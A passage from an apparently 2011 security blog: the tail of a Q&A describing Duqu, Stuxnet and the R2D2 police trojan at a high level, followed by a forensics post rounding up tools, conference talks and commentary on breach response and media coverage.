A: Yes. Because of the difficult mitigating factors, Stuxnet needed to spread itself without any external resources. And so it was equipped with numerous zero-day exploits. Out of context, Stuxnet's infection capabilities seem to be overkill, but then, its mission appears to have been a success, so those behind Stuxnet probably don't think so.

Q: How does Duqu differ?
A: Duqu is advanced but is not configured to act autonomously. Once the installer infects its target, Duqu calls home to a command and control (C&C) server. There are two servers that are currently known. One was located in India and the other was located in Belgium. The IP addresses are now inactive.

Q: What actions were carried out by the C&C?
A: In one known case, Duqu downloaded an infostealer to collect data from the target. That infostealer is actually the component from which Duqu gets its name, because it prepends log files related to stolen data with "DQ".

Q: What else can the C&C do?
A: For example, Duqu could be instructed to spread itself on the target network via shared network resources.

Q: How did Duqu send the collected data to the C&C?
A: It encrypted the data and appended it to JPG images.

Q: What? JPG images? Why?
A: So that somebody monitoring network traffic would only see innocent looking image files instead of confidential materials.

Q: Wow. Does Duqu do anything else sneaky?
A: Yes. After 30 days, unless told otherwise by the C&C, Duqu will delete itself limit evidence of the breach.

Q: Who is behind Duqu?
A: Unknown.

Q: What were they looking for, and why?
A: Unknown.

Q: What can you definitively tell us about Duqu?
A: The software components of "Operation Duqu" were made by a very skilled team of developers and exploit analysts.

Q: Can you speculate on Duqu's objectives?
A: Whatever it was, it must be very important to the interests of the nation state actor pulling the strings. It this actor's mind, the cost of disclosing a Windows kernel vulnerability is outweighed by the benefits. Only those with privileged information can accurately determine Duqu's true goals. Unless and until an identifiable direct action results.

Q: So you think a government agency is behind Duqu?
A: Yes.

Q: Should a government actor use malware such as Duqu?
A: It doesn't appear to be up for a vote.

Q: What about Germany's R2D2 trojan?
A: R2D2 is a trojan written for police surveillance. It did not use zero-day exploits and drivers signed with stolen certificates from legitimate hardware vendors. R2D2 was commissioned by German authorities for normal police work.

Q: But police trojans are not good, right?
A: No, malware often finds a way of escaping control. It never seems like a good idea to us.

Q: How bad is R2D2?
A: R2D2 appears to have far overreached what is allowed by German law. It has created a legal and political mess in Germany, but not so much of a technical mess. Our system automation determined R2D2 should not be trusted on its own long before human analysts ever took notice of it. The thing that made R2D2 valuable to the police was its limited install base. It was not really innovative in a way that could be co-opted by criminals.

Q: Are Stuxnet/Duqu innovative?
A: Yes, very much so. Once the vulnerability is disclosed, we (and others) will need to devote numerous man-hours creating strong generic detections for this new exploit. Other members of our Labs will need to datamine our file collections for software signed by C-Media in order to rescan them and process the results. Duqu creates technical headaches and the lessons learned will be adopted by criminals at some point.

Q: What about those that say that Duqu isn't related to Stuxnet?
A: Let's compare the similarities between the two operations.

• The installer exploits zero-day Windows kernel vulnerability(ies).
• Have components signed with a stolen certificates.
• Highly targeted in a way to suggests advanced intelligence.

The technical development team that coded and built the infrastructure for Duqu may differ in part from the team that developed Stuxnet. The highly targeted nature of the attacks suggests a considerable amount of human intelligence work was involved. This intelligence work could have been done by the same or different analysts, but that hardly matters. Whatever the composition of the teams involved, the similarities between the operations would suggest a common nation state actor pulling the strings.

Q: Will we ever learn the identity of this nation state?
A: Doesn't seem likely… at least not anytime soon. The consequences of Duqu's wake discourages any sort of disclosure.

Q: Does this nation state actor have other operations in progress?
A: Unknown. But it wouldn't seem very surprising if so.

Q: Final question (for now): Operation Duqu used an e-mail attachment. Isn't that something that everybody should be on guard against? Why use such a basic attack methodology?
A: Because it works.

Friday, October 28, 2011

Tools and Links

Tools and Links: Not long ago, I started a FOSS page for my blog, so I didn't have to keep going back and searching for various tools...if I find something valuable, I'll simply post it to this page and I won't have to keep looking for it. You'll notice that I really don't have much in the way of descriptions posted yet, but that will come, and hopefully others will find it useful. That doesn't mean the page is stagnant...not at all. I'll be updating the page as time goes on.

Melissa Augustine recently posted that she'd set up Volatility 2.0 on Windows, using this installation guide, and using the EXE for Distorm3 instead of the ZIP file. Take a look, and as Melissa says, be sure to thoroughly read and follow the instructions for installing various plugins. Thanks to Jamie Levy for providing such clear guidance/instructions, as I really think that doing so lowers the "cost of entry" for such a valuable tool. Remember..."there're more things in heaven and earth than are dreamt of in your philosophy." That is, performing memory analysis is a valuable skill to have, particularly when you have access to a memory dump, or to a live system from which you can dump memory. Volatility also works with hibernation files, from whence considerable information can be drawn, as well.

Now and again, you may run across whole disk encryption, or encrypted volumes on a system. I've seen these types of systems some cases, the customer has simply asked for an image (knowing that the disk is encrypted) and in others, the only recourse we have to acquire a usable image for analysis is to log into the system as an Admin and perform a live acquisition.

ZeroView from Technology Pathways, to detect WDE (scroll down on the linked page)

You can also determine if the system had been used to access TrueCrypt or PGP volumes by checking the MountedDevices key in the Registry (this is something that I've covered in my books). You can use the RegRipper plugin to collect/display this information, either from a System hive extracted from a system, or from a live system that you've accessed via F-Response.

David Hull gave a presentation on "Atemporal timeline analysis" at the recent SecTorCA conference (can find the presentation .wmv files here), and posted an abridged version of the presentation to the SANS Forensic blog (blog post here).

When I saw the title, the first thing I thought was...what? How do you talk about something independent of time in a presentation on timeline analysis? Well, even David mentions at the beginning of the recorded presentation that it's akin to "asexual sexual reproduction", the title is meant to be an oxymoron. In short, what the title seems to refer to is performing timeline analysis during an incident when you don't have any sort of time reference from which to start your analysis. This is sometimes the case...I've performed a number of exams having very little information from which to start my analysis, but finding something associated with the incident often leads me to the timeline, providing a significant level of context to the overall incident.

In this case, David said that the goal was to "find the attacker's code". Overall, the recorded presentation is a very good example of how to perform analysis using fls and timelines based solely on file system metadata, and using tools such as grep() to manipulate (as David mentions, "pivot on") the data. In short, the SANS blog post doesn't really address the use of "atemporal" within the context of the really need to watch the recorded presentation to see how that term applies.

Sniper Forensics
Also, be sure to check out Chris Pogue's "Sniper Forensics v3.0: Hunt" presentation, which is also available for download via the same page. There are a number of other presentations that would be very good to watch, as well...some talk about memory analysis. The latest iteration of Chris's "Sniper Forensics" presentations (Chris is getting a lot of mileage from these things...) makes a very important point regarding a lot of a cases, an artifact appears to be relevant to a case based on the analyst's experience. A lot of analysts find "interesting" artifacts, but many of these artifacts don't relate directly to the goals of their analysis. Chris gives some good examples of an "expert eye"; in one slide, he shows an animal track. Most folks might not even really care about that track, but to a hunter, or someone like me (ride horses in a national park), the track tells me a great deal about what I can expect to see.

This applies directly to "Sniper Forensics"; all snipers are trained in observation. Military snipers are trained to quickly identify military objects, and to look for things that are "different". For example, snipers will be sent to observe a route of travel, and will recognize freshly turned earth or a pile of trash on that route when the sun comes up the next day...this might indicate an attempt to hide an explosive device.

How does this apply to digital forensic analysis? Well, if you think about it, it is very applicable. For example, let's say that you happen to notice that a DLL was modified on a system. This may stand out as odd, in part because it's not something that you've seen a great deal you create a timeline for analysis, and see that there wasn't a system or application update at that time.

Much like a sniper, a digital forensic analyst must be focused. A sniper observes an area in order to gain intelligence...enemy troop movements, civilian traffic through the area, etc. Is the sniper concerned with the relative airspeed of an unladen swallow? While that artifact may be "interesting", it's not pertinent to the sniper's goals. The same holds true with the digital forensic may find something "interesting" but how does that apply to your goals, or should you get your scope back on the target?

Data Breach 'Best Practices'
I ran across this article recently on the GovernmentHealthIT site, and while it talks about breach response best practices, I'd strongly suggest that all four of these steps need to be performed before a breach occurs. After all, while the article specifies PII/PHI, regulatory and compliance organizations for those and other types of data (PCI) specifically state the need for an incident response plan (PCI DSS para 12.9 is just one example).

Item 1 is taking an inventory...I tell folks all the time that when I've done IR work, one of the first things I ask is, where is your critical data. Most folks don't know. A few that have have also claimed (incorrectly) that it was encrypted at rest. I've only been to one site where the location of sensitive data was known and documented prior to a breach, and that information not only helped our response analysis immensely, it also reduced the overall cost of the response (in fines, notification costs, etc.) for the customer.

While I agree with the sentiment of item 4 in the article (look at the breach as an opportunity), I do not agree with the rest of that item; i.e., "the opportunity to find all the vulnerabilities in an organization—and find the resources for fixing them."

Media Stuff
Brian Krebs has long followed and written on the topic of cybercrime, and one of his recent posts is no exception. I had a number of take-aways from this post that may not be intuitively obvious:

1. "Password-stealing banking Trojans" is ambiguous, and could be any of a number of variants. The "Zeus" (aka, Zbot) Trojan is mentioned later in the post, but there's no information presented to indicate that this was, in fact, a result of that specific malware. Anyone who's done this kind of work for a while is aware that there are a number of malware variants that can be used to collect online banking credentials.

2. Look at the victims mentioned in Brian's post...none of them is a big corporate entity. Apparently, the bad guys are aware that smaller targets are less likely to have detection and response capabilities (*cough*CarbonBlack*cough*). This, in turn, leads directly to #3...

3. Nothing in the post indicates that a digital forensics investigation was done of systems at the victim location. With no data preserved, no actual analysis was performed to identify the specific malware, and there's nothing on which law enforcement can build a case.

Finally, while the post doesn't specifically mention the use of Zeus at the beginning, it does end with a graphic showing detection rates of new variants of the Zeus Trojan over the previous 60 days; the average detection rate is below 40%. While the graphic is informative,

More Media Stuff
I read this article recently from InformationWeek that relates to the recent breach of NASDAQ systems; I specifically say "relates" to the breach, as the article specifies, "...two experts with knowledge of Nasdaq OMX Group's internal investigation said that while attackers hadn't directly attacked trading servers...". The title of the article includes the words "3 Expected Findings", and the article is pretty much just speculation about what happened, from the get-go. In fact, the article goes on to say, "...based on recent news reports, as well as likely attack scenarios, we'll likely see these three findings:". That's a lot of "likely" in one sentence, and this much speculation is never a good thing.

My concern with this is that the overall take-away from this is going to be "NASDAQ trading systems were hit with SQL injection", and folks are going to be looking for this sort of thing...and some will find it. But others will miss what's really happening while they're looking in the wrong direction.

Other Items
F-Response TACTICAL Examiner for Linux now has a GUI
Lance Mueller has closed his blog; old posts will remain, but no new content will be posted